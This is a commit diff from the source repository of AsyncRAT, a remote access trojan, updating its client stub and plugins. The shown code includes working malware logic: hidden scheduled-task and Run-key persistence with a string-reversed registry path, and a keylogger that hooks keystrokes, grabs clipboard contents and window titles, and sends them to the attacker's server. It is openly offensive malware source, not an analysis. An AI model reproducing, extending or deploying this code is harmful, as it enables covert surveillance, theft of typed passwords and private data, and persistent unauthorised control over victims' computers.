Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update

Browse Source 
fixed startup method
PlatformTarget from anycpu to x86
This commit is contained in:
NYAN CAT 2020-05-04 03:53:36 +03:00
parent 59ea9b088b
commit 565441b92a
7 changed files with 25 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
AsyncRAT-C#/Client/Client.csproj
View File

@ -47,7 +47,7 @@
<GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies> <GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' "> <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget> <PlatformTarget>x86</PlatformTarget>
<DebugType>none</DebugType> <DebugType>none</DebugType>
<Optimize>true</Optimize> <Optimize>true</Optimize>
<OutputPath>..\Binaries\Release\Stub\</OutputPath> <OutputPath>..\Binaries\Release\Stub\</OutputPath>

4
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -34,7 +34,7 @@ namespace Client.Install
Process.Start(new ProcessStartInfo Process.Start(new ProcessStartInfo
{ {
FileName = "cmd", FileName = "cmd",
Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit", Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + "\"" + Path.GetFileNameWithoutExtension(installPath.Name) + "\"" + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
WindowStyle = ProcessWindowStyle.Hidden, WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true, CreateNoWindow = true,
}); });
@ -43,7 +43,7 @@ namespace Client.Install
{ {
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree)) using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
{ {
key.SetValue(Path.GetFileNameWithoutExtension(installPath.FullName), "\"" + installPath.FullName + "\""); key.SetValue(Path.GetFileNameWithoutExtension(installPath.Name), "\"" + installPath.FullName + "\"");
} }
} }

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -13,7 +13,7 @@ namespace Client
#if DEBUG #if DEBUG
public static string Ports = "6606"; public static string Ports = "6606";
public static string Hosts = "127.0.0.1"; public static string Hosts = "127.0.0.1";
public static string Version = "0.5.6E"; public static string Version = "0.5.7A";
public static string Install = "false"; public static string Install = "false";
public static string InstallFolder = "AppData"; public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe"; public static string InstallFile = "Test.exe";

30
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs
View File

@ -53,7 +53,7 @@ namespace Plugin
MsgPack msgpack = new MsgPack(); MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger"; msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid; msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("log").AsString = $"\n### Clipboard ###\n{Clipboard.GetCurrentText()}\n"; msgpack.ForcePathObject("log").AsString = $"\n\r[Clipboard]\n{Clipboard.GetCurrentText()}\n\r";
Connection.Send(msgpack.Encode2Bytes()); Connection.Send(msgpack.Encode2Bytes());
} }
base.WndProc(ref m); base.WndProc(ref m);
@ -184,11 +184,8 @@ namespace Plugin
} }
else else
{ {
sb.Append(Environment.NewLine); sb.Append($"\n\r[{DateTime.Now.ToShortTimeString()}] [{GetActiveWindowTitle()}]");
sb.Append(Environment.NewLine); sb.Append($"\n{currentKey}");
sb.Append($"### {GetActiveWindowTitle()} | {DateTime.Now.ToShortTimeString()} ###");
sb.Append(Environment.NewLine);
sb.Append(currentKey);
} }
MsgPack msgpack = new MsgPack(); MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger"; msgpack.ForcePathObject("Packet").AsString = "keyLogger";
@ -225,19 +222,20 @@ namespace Plugin
{ {
try try
{ {
IntPtr hwnd = GetForegroundWindow(); const int nChars = 256;
GetWindowThreadProcessId(hwnd, out uint pid); StringBuilder stringBuilder = new StringBuilder(nChars);
Process p = Process.GetProcessById((int)pid); IntPtr handle = GetForegroundWindow();
string title = p.MainWindowTitle; GetWindowThreadProcessId(handle, out uint pid);
if (string.IsNullOrWhiteSpace(title)) if (GetWindowText(handle, stringBuilder, nChars) > 0)
title = p.ProcessName; {
CurrentActiveWindowTitle = title; CurrentActiveWindowTitle = stringBuilder.ToString();
return title; return CurrentActiveWindowTitle;
}
} }
catch (Exception) catch (Exception)
{ {
return "???";
} }
return "???";
} }
#region "Hooks & Native Methods" #region "Hooks & Native Methods"
@ -249,6 +247,8 @@ namespace Plugin
private static string CurrentActiveWindowTitle; private static string CurrentActiveWindowTitle;
[DllImport("user32.dll")]
private static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

8
AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
View File

@ -23,12 +23,10 @@ namespace Plugin.Handler
{ {
Process.Start(new ProcessStartInfo() Process.Start(new ProcessStartInfo()
{ {
FileName = "schtasks", FileName = "cmd",
Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'", Arguments = "/c schtasks /delete /f /tn " + "\"" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true, CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
}); });
} }
} }

4
AsyncRAT-C#/Server/Properties/AssemblyInfo.cs
View File

@ -31,5 +31,5 @@ using System.Runtime.InteropServices;
// You can specify all the values or you can default the Build and Revision Numbers // You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below: // by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")] // [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("0.5.6.0")] [assembly: AssemblyVersion("0.5.7.0")]
[assembly: AssemblyFileVersion("0.5.6.0")] [assembly: AssemblyFileVersion("0.5.7.0")]

2
AsyncRAT-C#/Server/Settings.cs
View File

@ -19,7 +19,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate; public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.6E"; public static readonly string Version = "AsyncRAT 0.5.7A";
public static object LockListviewClients = new object(); public static object LockListviewClients = new object();
public static object LockListviewLogs = new object(); public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object(); public static object LockListviewThumb = new object();